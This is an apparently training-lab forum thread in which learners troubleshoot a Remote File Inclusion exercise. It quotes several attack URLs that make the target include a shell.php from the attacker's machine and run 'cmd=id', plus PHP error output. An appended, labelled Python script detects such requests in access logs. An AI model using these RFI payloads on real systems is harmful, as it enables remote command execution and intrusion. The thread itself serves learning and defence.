Academy: Remote File Inclusion page 5

The challenge for this academy tutorial says: “Attack the target, gain command execution by exploiting the RFI vulnerability, and submit the contents of the flag.txt file located in the /exercise directory.”

However, I can’t, for the life of me, figure out how to recreate the steps shown in the tutorial. I created the python http server on 8080, checked it using the browser (it logs the access in the terminal). I created the shell script (it appears in the directory of the web browser). But, when I try to attack the target using the RFI technique I get nothing. The python server doesn’t log any activity and the history paragraph displays an error:
"include(http://localhost:8080/shell.php&cmd=id): failed to open stream: Cannot assign requested address in /var/www/html/index.php on line 47

Warning: include(): Failed opening ‘http://localhost:8080/shell.php&cmd=id’ for inclusion (include_path=‘.:/usr/share/php’) in /var/www/html/index.php on line 47

Notice: Undefined variable: p2 in /var/www/html/index.php on line 48

I’m new to this so my ability to troubleshoot is limited. Did anyone else have this problem, if so were you able to accomplish the task? If so how? Thanks in advance.

you should be changing that localhost:8080 address to the address of your attack box (ex. 10.10.10.10:8080) that you’re using. if you followed the rest of the steps that will work properly.
localhost is just what they used in the example

1 Like

I guess I should have assumed that, sometimes I wish the directions were more explicit… Or I was smarter, lol. Thank you!

Please can you help me? I have a problem in this task. Warning: include(http://0.0.0.0:8080/shell.php): failed to open stream: Connection refused in /var/www/html/index.php on line 47. I did everything well I think. Do you have any idea what it could be? My link is http://RESPAWNED_TARGET_IP/index.php?language=http://0.0.0.0:8080/shell.php&cmd=id. I have http server running and shell.php exists

You shouldn’t use 0.0.0.0 as the ip. Instead, you should use your ip so that the include() statement tries to include your file

Spoiler Removed

hello, i’ve started the python web server on port 8080 and used my machine’s ip using hostname -I | awk '{print $1}', for the host, and the URL looks like http://TARGET_IP/index.php?language=http://MACHINE_IP:8080/shell.php&cmd=id. i’ve tested if shell.php is being served but it gives me Connection timed out. is there something i’m missing?

hi again, i’ve also tried using pyftpdlib and the ftp protocol but now it’s giving me connect() failed: Connection timed out and failed to open stream: operation failed .... again, i’ve tested if shell.php is being served and the URL now is http://TARGET_IP/index.php?language=ftp://MACHINE_IP/shell.php&cmd=id

^^^ ok i solved it

http://RESPAWNTARGET_IP/index.php?language=ftp://MACHINE_IP(tunnel ip given when connected to vpn):PORTUSED/shell.php&cmd=id results in connection timed out and no update on my listener terminal, http://RESPAWNTARGET_IP/index.php?language=ftp:/RESPAWNTARGET_IP/shell.php&cmd=id results in the same… upon browsing MACHINE_IP:PORTUSED shell.php is visible and terminal listener registers that it was accessed. My problem is that RESPAWNTARGET_IP and my binded to tunnel VPN IP http server do not communicate upon entering given command, AT ALL, given no commands, given different commands i am stuck bad.

I got the same problem

Do you remember how to fix it?

The error doesn’t mean anything. You simply need to correct your syntax in the url, at least that was my problem. Medium has a good article on the machine.
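
Added example, not part of any post in this thread: a defender-side check that scans web access logs for requests shaped like the ones quoted above, where a query parameter carries an http:// or ftp:// URL, and labels whether the host points back at the server itself (localhost, 0.0.0.0) or at another machine. The log lines, addresses, and function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes the thread shows being passed to include(): http:// and ftp:// (https added).
REMOTE_SCHEMES = {"http", "https", "ftp"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation-range addresses, not from the thread).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=http://localhost:8080/shell.php&cmd=id HTTP/1.1" 200 734
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=ftp%3A%2F%2F203.0.113.5%2Fshell.php&cmd=id HTTP/1.1" 200 734
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?language=HTTP://0.0.0.0:8080/shell.php HTTP/1.1" 200 734
"""

def classify_host(host):
    """'local' if the web server would end up talking to itself, else 'external'."""
    if host == "localhost":
        return "local"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a DNS name other than localhost
    return "local" if (ip.is_loopback or ip.is_unspecified) else "external"

def find_remote_includes(log_text):
    """Return (param, scheme, host, kind) for every query value that is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl percent-decodes values, so encoded ftp%3A%2F%2F... is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            target = urlsplit(value.strip())  # urlsplit lowercases the scheme
            if target.scheme in REMOTE_SCHEMES and target.hostname:
                findings.append((name, target.scheme, target.hostname,
                                 classify_host(target.hostname)))
    return findings

if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE_LOG):
        print(finding)
```
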